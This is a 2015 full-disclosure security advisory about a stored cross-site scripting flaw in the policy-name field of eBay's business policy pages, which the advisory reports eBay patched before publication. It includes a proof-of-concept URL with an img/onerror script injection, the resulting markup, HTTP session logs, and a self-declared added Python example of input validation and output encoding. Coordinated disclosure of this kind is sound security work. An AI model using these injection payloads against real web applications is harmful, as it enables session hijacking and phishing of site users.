
List:       full-disclosure
Subject:    [FD] Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2015-04-21 9:58:08
Message-ID: 55361F30.1040803 () vulnerability-lab ! com

Document Title:
===============
Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1228


Release Date:
=============
2015-03-25


Vulnerability Laboratory ID (VL-ID):
====================================
1228


Common Vulnerability Scoring System:
====================================
4


Product & Service Introduction:
===============================
eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered
in San Jose, California. It was founded by Pierre Omidyar in 1995, and became a notable
success story of the dot-com bubble; it is now a multi-billion dollar business with operations
localized in over thirty countries. The company manages eBay.com, an online auction and
shopping website in which people and businesses buy and sell a broad variety of goods and
services worldwide. In addition to its auction-style sellings, the website has since expanded
to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via
Half.com); online classified advertisements; online event ticket trading; online money transfers
and other services.

(Copy of the Homepage: http://en.wikipedia.org/wiki/EBay )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple persistent input validation web
vulnerabilities in the official Ebay Xcom Policy Web-Application (CMS & API).


Vulnerability Disclosure Timeline:
==================================
2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2014-03-17: Vendor Notification (eBay Inc - Security Research Team)
2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team)
2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team)
2015-03-25: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Ebay Inc.
Product: Ebay Inc - Official WebSite Magento Application & API 2014 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple application-side input validation web vulnerabilities have been discovered in the
official Ebay Xcom Policy Web-Application (CMS & API). A persistent validation web
vulnerability allows remote attackers to inject malicious script codes to the application-side
of the affected ebay online-service.

The vulnerability is located in the `my ebay account > return policy > edit return policy`
module. The vulnerable input is the return policy name value. The persistent script code
execution occurs in the affected vulnerable sections of the connected `businesspolicy/manage`
and `Activity Log - Item Listing` modules. The attack vector is persistent and the severity is
medium.

The security risk of the persistent web vulnerability is estimated as medium with a cvss
(common vulnerability scoring system) count of 4.0. Exploitation of the persistent input
validation vulnerability requires a low privileged web-application user account and low user
interaction. Successful exploitation results in session hijacking, persistent phishing
attacks, persistent external redirects and malware loads, or persistent manipulation of affected
and connected module context.

Request Method(s):
					[+] POST

Vulnerable Module(s):
					[+] My Account > Return Policy > Edit Return Policy (http://www.bizpolicy.ebay.com/businesspolicy/)

Vulnerable Input(s):
					[+] Edit return policy  >  Policy name

Vulnerable Parameter(s):
					[+] name

Affected Module(s):
					[+] ebay.com/businesspolicy/manage
					[+] Activity Log - Item Listing > Name


Proof of Concept (PoC):
=======================
The application-side cross site web vulnerability can be exploited by remote attackers with a low
privileged application user account and low or medium user interaction. For security
demonstration or to reproduce the vulnerability, follow the provided information and steps below.

PoC: Manage your business policies
http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=Return+Policy+1+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt([PERSISTENT INJECTED SCRIPT CODES!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money+Back&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=&_=1395079926788



PoC: Manage your business policies

<a href="return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage">Return Policy 1 [PERSISTENT SCRIPT CODE EXECUTION!]"><img src="x" onerror="prompt(23);"></a>


--- PoC Session Logs [GET] (Injection)---
Status: 200[OK]
GET http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=Return++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money+Back+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E++++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&_=1395079183016
Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime Type[application/json]
   Request Header:
      Host[www.bizpolicy.ebay.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage]
      Connection[keep-alive]
   Response Header:
      rlogid[t6al%7Cwliodz%3F%3Cwk%7D%3Ee36e*715f-144d1330b33-0x95]
      Content-Encoding[gzip]
      Content-Type[application/json;charset=UTF-8]
      Transfer-Encoding[chunked]
      Date[Mon, 17 Mar 2014 17:59:47 GMT]
      Server[eBay Server]

Status: 200[OK]
GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395075357940 
Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[22] Mime Type[text/plain]
   Request Header:
      Host[my.ebay.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbayBeta&CurrentPage=MyeBayNextNotificationPreferences&FClassic=true&ssPageName=STRK:ME:MANPX&_trksid=p5039.m2295.l3917]
      Connection[keep-alive]
   Response Header:
      Server[Apache-Coyote/1.1]
      rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.g%6047-144d1334a30-0x133]
      Cache-Control[private]
      Pragma[no-cache]
      Content-Type[text/plain]
      Content-Length[22]
      Date[Mon, 17 Mar 2014 18:00:03 GMT]

Status: 200[OK]
GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395079046614
Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[22] Mime Type[text/plain]
   Request Header:
      Host[my.ebay.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&CurrentPage=MyeBayPreferences&FClassic=true&ssPageName=STRK:ME:MAPRX]
      Connection[keep-alive]
   Response Header:
      Server[Apache-Coyote/1.1]
      rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.32%3Ef-144d1334c9e-0x132]
      Cache-Control[private]
      Pragma[no-cache]
      Content-Type[text/plain]
      Content-Length[22]
      Date[Mon, 17 Mar 2014 18:00:03 GMT]



PoC:  Activity log: Return Policy 1 [x]

<div>
<h2 class="act-title">Activity log: <span id="policy_name">Return Policy 1 "><[PERSISTENT INJECTED SCRIPT CODES!]);"></span></h2>
<div id="activityLogContent" class="act-cnt">
<table cellpadding="0" cellspacing="0">	
<thead><tr>
<th class="first">Date/Time</th>
<th class="second">Action</th>
<th class="third">Description</th>
<th class="fourth">Report</th>
</tr></thead></table>

Note: After the exploitation, the activity log service is also compromised.


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://www.bizpolicy.ebay.com/businesspolicy/x[PERSISTENT INJECTED SCRIPT CODE!]
Load Flags[LOAD_NORMAL] Größe des Inhalts[1201] Mime Type[text/html]
   Request Header:
      Host[www.bizpolicy.ebay.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
      Accept[image/png,image/*;q=0.8,*/*;q=0.5]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1]
      Connection[keep-alive]
   Response Header:
      rlogid[t6al%7Cwliodz%3F%3Cwk%7D1e37e*%3B27c-144d14de1b3-0x96]
      Content-Type[text/html;charset=utf-8]
      Content-Length[1201]
      Date[Mon, 17 Mar 2014 18:29:05 GMT]
      Server[eBay Server]


Reference(s):
http://www.ebay.com/businesspolicy/
http://www.bizpolicy.ebay.com/businesspolicy/return
http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=
http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage
http://www.bizpolicy.ebay.com/businesspolicy/manage?pageNumber=1&totalPages=1&context={%22status%22%3A%22success_edit_return%22}
http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage
http://www.bizpolicy.ebay.com/businesspolicy/
http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure encode and parse of the vulnerable policy name in
the item list and in the activity log name list. Restrict the input field for special characters
and disallow wrong inputs by usage of a secure exception-handling to prevent script code executions.
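
The two measures above, as an added example that is not part of the original advisory and not eBay's code: an allow-list check on the `profileName` request parameter, and HTML encoding of the stored name where the manage list and the activity log render it. The function names, the allow-list pattern and the sample request are assumptions made for illustration.

```python
import html
import re
from typing import Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# Assumed allow-list for a policy name: letters, digits, spaces and a little
# punctuation, 1-64 characters. The advisory does not state the real field rules.
POLICY_NAME_RE = re.compile(r"[A-Za-z0-9 .,_\-]{1,64}")

# Constructed sample request (path only), modelled on the advisory's edit
# request, carrying the marker payload shown in its PoC markup.
SAMPLE_EDIT_REQUEST = (
    "/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL"
    "&profileName=Return+Policy+1+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt(23)%3B%3E"
    "&profileDesc=Returns+Accepted"
)


def validate_policy_name(name: str) -> Optional[str]:
    """Return the trimmed name if it matches the allow-list, else None."""
    name = name.strip()
    return name if POLICY_NAME_RE.fullmatch(name) else None


def policy_name_from_request(request_target: str) -> Optional[str]:
    """Input side: URL-decode profileName and reject anything off the allow-list.

    Duplicate or missing profileName parameters are rejected as well, so the
    validated value is the only one later code can store.
    """
    query = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    values = query.get("profileName", [])
    if len(values) != 1:
        return None
    return validate_policy_name(values[0])


def render_manage_link_unsafe(profile_id: int, name: str) -> str:
    """The flawed pattern: the stored name is concatenated into markup as-is."""
    return f'<a href="return?profileId={profile_id}&source=manage">{name}</a>'


def render_manage_link(profile_id: int, name: str) -> str:
    """Output side for the manage list: encode both the href and the link text."""
    href = "return?" + urlencode(
        {"profileType": "RETURN_POLICY", "profileId": profile_id, "source": "manage"}
    )
    return (
        f'<a href="{html.escape(href, quote=True)}">'
        f"{html.escape(name, quote=True)}</a>"
    )


def render_activity_title(name: str) -> str:
    """Output side for the activity log heading that shows the policy name."""
    return (
        '<h2 class="act-title">Activity log: '
        f'<span id="policy_name">{html.escape(name, quote=True)}</span></h2>'
    )


if __name__ == "__main__":
    # A name stored before input validation existed still reaches the renderers,
    # which is why encoding on output is required in addition to the input check.
    stored = 'Return Policy 1 "><img src=x onerror=prompt(23);>'
    print("request accepted:", policy_name_from_request(SAMPLE_EDIT_REQUEST))
    print("unsafe :", render_manage_link_unsafe(52844186015, stored))
    print("encoded:", render_manage_link(52844186015, stored))
    print("log    :", render_activity_title(stored))
```

Input validation alone does not cover names already stored, so the encoded renderers are the part that protects both affected modules.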


Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the policy name &
activity-log module is estimated as medium. (CVSS 4.0)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty.
Vulnerability Lab disclaims all warranties, either expressed or implied, including the
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its
suppliers are not liable in any case of damage, including direct, indirect, incidental,
consequential loss of business profits or special damages, even if Vulnerability-Lab or its
suppliers have been advised of the possibility of such damages. Some states do not allow the
exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires
authorization from Vulnerability Laboratory. Permission to electronically redistribute this
alert in its unmodified form is granted. All other rights, including the use of other media,
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website is trademark of
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com)
to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt



